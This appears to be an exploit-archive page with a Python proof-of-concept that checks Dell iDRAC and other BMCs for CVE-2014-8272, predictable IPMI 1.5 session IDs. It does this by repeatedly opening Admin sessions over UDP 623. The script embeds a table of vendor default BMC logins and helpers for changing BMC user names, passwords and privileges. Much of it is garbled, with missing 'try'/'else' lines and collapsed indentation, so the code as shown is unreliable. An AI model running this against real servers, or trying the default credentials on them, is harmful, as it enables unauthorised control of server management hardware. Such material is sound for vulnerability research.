Dell iDRAC IPMI 1.5 – Insufficient Session ID Randomness

  • 作者: Yong Chuan, Koh
    日期: 2015-01-13
  • 类别:
  • 来源:
  • """
    For testing purposes only.
    (c) Yong Chuan, Koh 2014
    from time import sleep
    from socket import *
    from struct import *
    from random import *
    import sys, os, argparse 
    HOST = None
    PORT = 623
    bufsize = 1024
    recv = ""
    # create socket
    UDPsock = socket(AF_INET,SOCK_DGRAM)
    data = 21	#offset of data start
    RMCP = ('\x06' + 	#RMCP.version = ASF RMCP v1.0
    	'\x00' +	#RMCP.reserved
    	'\xFF' +	#RMCP.seq
    	'\x07'		#RMCP.Type/Class = Normal_RMCP/IPMI
    def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None):
    	auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}
    	sess_header = ''
    	sess_header += pack('<B', auth_types[auth_type])
    	sess_header += pack('<L', seq_num)
    	sess_header += pack('<L', sess_id)
    	if auth_type is not 'None':
    		raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd
    		import hashlib
    		h = hashlib.md5(raw)
    		sess_header += h.digest()
    	sess_header += pack('B', len(ipmi))
    	return sess_header
    class CreateIPMI ():
    	def __init__ (self):
    		self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 }
    		self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'}
    		self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}
    	def CheckSum (self, bytes):
    		chksum = 0
    		q = ''
    		for i in bytes:
    			q += '%02X ' %ord(i)
    			chksum = (chksum + ord(i)) % 0x100
    		if chksum > 0:
    			chksum = 0x100 - chksum
    		return pack('>B', chksum)
    	def Header (self, cmd, seq_num=0x00):
    		#only for IPMI v1.5
    		cmds = {'Get Channel Auth Capabilities'	: (0x06, 0x38), #(netfn, cmd_code)
    			'Get Session Challenge'		: (0x06, 0x39), 
    			'Activate Session'		: (0x06, 0x3a),
    			'Set Session Privilege Level'	: (0x06, 0x3b),
    			'Close Session'			: (0x06, 0x3c),
    			'Set User Access'		: (0x06, 0x43),
    			'Get User Access'		: (0x06, 0x44),
    			'Set User Name'			: (0x06, 0x45),
    			'Get User Name'			: (0x06, 0x46),
    			'Set User Password'		: (0x06, 0x47),
    			'Get Chassis Status'		: (0x00, 0x01)}
    		ipmi_header = ''
    		ipmi_header += pack('<B', 0x20)			#target addr
    		ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) 	#netfn | target lun
    		ipmi_header += self.CheckSum (ipmi_header)
    		ipmi_header += pack('<B', 0x81)			#source addr
    		ipmi_header += pack('<B', seq_num<<2 | 0)	#seq_num | source lun
    		ipmi_header += pack('<B', cmds[cmd][1])		#IPMI message command
    		return ipmi_header
    	def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'):
    		ipmi = ''
    		ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq)
    		ipmi += pack('<B', 0<<7 | chn)			#IPMI v1.5 | chn num (0-7, 14=current_chn, 15)
    		ipmi += pack('<B', self.priv_lvls[priv_lvl])	#requested privilege level
    		ipmi += self.CheckSum (ipmi[3:])
    		return ipmi
    	def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'):
    		#only for IPMI v1.5
    		ipmi = ''
    		ipmi += self.Header('Get Session Challenge', hdr_seq)
    		ipmi += pack('<B', self.auth_types[auth_type])	#authentication type
    		ipmi += username				#user name
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'):
    		#only for IPMI v1.5	
    		ipmi = ''
    		ipmi += self.Header('Activate Session', hdr_seq)
    		ipmi += pack('>B', self.auth_types[auth_type])
    		ipmi += pack('>B', self.priv_lvls[priv_lvl])
    		ipmi += authcode		#challenge string
    		ipmi += pack('<L', 0xdeadb0b0)	#initial outbound seq num
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'):
    		#only for IPMI v1.5
    		ipmi = ''
    		ipmi += self.Header('Set Session Privilege Level', hdr_seq)
    		ipmi += pack('>B', self.priv_lvls[priv_lvl])
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def CloseSession (self, hdr_seq, sess_id):
    		ipmi = ''
    		ipmi += self.Header ("Close Session", hdr_seq)
    		ipmi += pack('<L', sess_id)
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def GetChassisStatus (self, hdr_seq):
    		ipmi = ''
    		ipmi += self.Header ("Get Chassis Status", hdr_seq)
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E):
    		ipmi = ''
    		ipmi += self.Header ("Get User Access", hdr_seq)
    		ipmi += pack('>B', chn_num)		#chn_num = 0x0E = current channel
    		ipmi += pack('>B', user_id)
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def GetUserName (self, hdr_seq, user_id=2):
    		ipmi = ''
    		ipmi += self.Header ("Get User Name", hdr_seq)
    		ipmi += pack('>B', user_id)
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def SetUserName (self, hdr_seq, user_id, user_name):
    		#Assign user_name to user_id, replaces if user_id is occupied
    		ipmi = ''
    		ipmi += self.Header ("Set User Name", hdr_seq)
    		ipmi += pack('>B', user_id)
    		ipmi += user_name.ljust(16, '\x00')
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def SetUserPassword (self, hdr_seq, user_id, password, op='set password'):
    		ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3}
    		ipmi = ''
    		ipmi += self.Header ("Set User Password", hdr_seq)
    		ipmi += pack('>B', user_id)
    		ipmi += pack('>B', ops[op])
    		ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    	def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E):
    		ipmi = ''
    		ipmi += self.Header ("Set User Access", hdr_seq)
    		ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn)	#bit4=1=enable user for IPMI Messaging | chn=0xE=current channel
    		ipmi += pack('>B', user_id)
    		ipmi += pack('>B', self.priv_lvls[new_priv])
    		ipmi += pack('>B', 0)
    		ipmi += self.CheckSum(ipmi[3:])
    		return ipmi
    def SendUDP (pkt):
    	global HOST, PORT, data
    	res = ''
    	code = ipmi_seq = 0xFFFF
    	for i in range(5):
    			UDPsock.sendto(pkt, (HOST, PORT))
    			res = UDPsock.recv(bufsize)
    		except Exception as e:
    			print '[-] Socket Timeout: Try %d'%i
    			sleep (0)
    			#have received a reply
    			if res[4:5] == '\x02':		#Session->AuthType = MD5
    				data += 16
    			code 	= unpack('B',res[data-1:data])[0]
    			ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2
    			if res[4:5] == '\x02':
    				data -= 16
    	return code, ipmi_seq, res
    def SetUpSession (username, pwd, priv='Admin', auth='MD5'):
    	global data
    	#Get Channel Authentication Capabilities
    	ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv)
    	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
    	if code != 0x00:
    		return code, 0, 0, 0
    	#print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq)
    	#Get Session Challenge
    	ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5')
    	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
    	if code != 0x00:
    if code == 0xFFFF:
    print "[-] BMC didn't respond to IPMI v1.5 session setup"
    print "If firmware had disabled it, then BMC is not vulnerable"
    		return code, 0, 0, 0
    	temp_sess_id 	= unpack('<L', res[data:data+4])[0]
    	challenge_str 	= res[data+4:data+4+16]
    	#print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq)
    	#Activate Session
    	ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv)
    	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi)
    	if code != 0x00:
    		return code, 0, 0, 0
    	data += 16
    	sess_auth_type 			= unpack('B', res[data:data+1])[0]
    	sess_id 			= unpack('<L', res[data+1:data+1+4])[0]
    	ini_inbound = sess_hdr_seq 	= unpack('<L', res[data+5:data+5+4])[0]
    	sess_priv_lvl 			= unpack('B', res[data+9:data+9+1])[0]
    	#print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq)
    	#print ' %-30s: Session_ID %08X'%sess_id
    	data -= 16
    	#Set Session Privilege Level
    	ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv)
    	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi)
    	sess_hdr_seq += 1
    	if code != 0x00:
    		return code, 0, 0, 0
    	new_priv_lvl = unpack('B', res[data:data+1])[0]
    	#print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq)
    	return code, temp_sess_id, sess_hdr_seq, sess_id
    def CloseSession (sess_seq, sess_id):
    	global data
    	#Close Session
    	ipmi = CreateIPMI().CloseSession(5, sess_id)
    	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
    	#print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq)
    	return code
    def CheckSessionAlive(sess_seq, sess_id):
    	#SetUserPassword(): "user enable <user_id>"
    	ipmi = CreateIPMI().GetChassisStatus(31)
    	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
    	print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq)
    	sess_seq += 1
    	return sess_seq
    def banner():
    print ("######################################################\n"+\
     "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\
     "## (\n"+\
     "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\
     "## and checking that these values are incremental\n"+\
     "## \n"+\
     "## Author:Yong Chuan, Koh\n"+\
     "## Email:\n"+\
     "## (c) Yong Chuan, Koh 2014\n"+\
    def main():
    #default usernames/passwords (
    vendors = {"HP" :{"user":"Administrator", "pwd":""}, #no default pwd: <factory randomized 8-character string>
     "DELL" :{"user":"root","pwd":"calvin"},
     "FUJITSU":{"user":"admin", "pwd":"admin"},
     "SUPERMICRO" :{"user":"ADMIN", "pwd":"ADMIN"},
     "ORACLE" :{"user":"root","pwd":"changeme"},
     "ASUS" :{"user":"admin", "pwd":"admin"}
    arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values")
    arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server")
    arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)")
    arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)")
    arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)")
    arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)")
    args = arg.parse_args()
    if args.vendor is not None: args.vendor = args.vendor.upper()
    if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None):
    print "[-] Error: -n and -p are required because -v is not specified/in default list"
    print "Vendors with Default Accounts"
    print "-----------------------------------"
    for vendor,acct in vendors.iteritems():
    print "%s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"])
    if args.username is None: args.username = vendors[args.vendor]["user"].ljust(16, '\x00')
    if args.password is None: args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00')
    global HOST, PORT
    HOST = args.ip
    PORT = args.udpport
    print "Script Parameters"
    print "-------------------------"
    print "IP : %s"%HOST
    print "Port : %d"%PORT
    print "Username : %s"%args.username
    print "Password : %s"%args.password
    session_ids = []
    for i in xrange(0x80):#do not go beyond 0xFF, because of how session_ids is checked for incremental later
    code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5')
    if code == 0:
    print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id)
    #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i)
    code = CloseSession (sess_seq, sess_id)
    if code == 0:
    #print '[+%04X] Close Session OK'%(i)
    i += 1
    sleep (0.5)
    #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i)
    except Exception as e:
    exc_type, exc_obj, exc_tb = sys.exc_info()
    fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
    print (exc_type, fname, exc_tb.tb_lineno)
    session_ids = session_ids[:0xFF]
    #get the first incremental diff
    const_diff = None
    for i in xrange(1, len(session_ids)):
    if session_ids[i-1] < session_ids[i]:
    const_diff = session_ids[i] - session_ids[i-1]
    #check if session_ids are increasing at a fixed value
    vulnerable = True
    crossed_value_boundary = 0
    for i in xrange(1, len(session_ids)):
    if session_ids[i]-session_ids[i-1] != const_diff:
    if crossed_value_boundary < 2:
    crossed_value_boundary += 1
    vulnerable = False
    if vulnerable:
    print "Conclusion: BMC is vulnerable to CVE-2014-8272"
    print "Conclusion: BMC is not vulnerable to CVE-2014-8272"
    if __name__ == "__main__":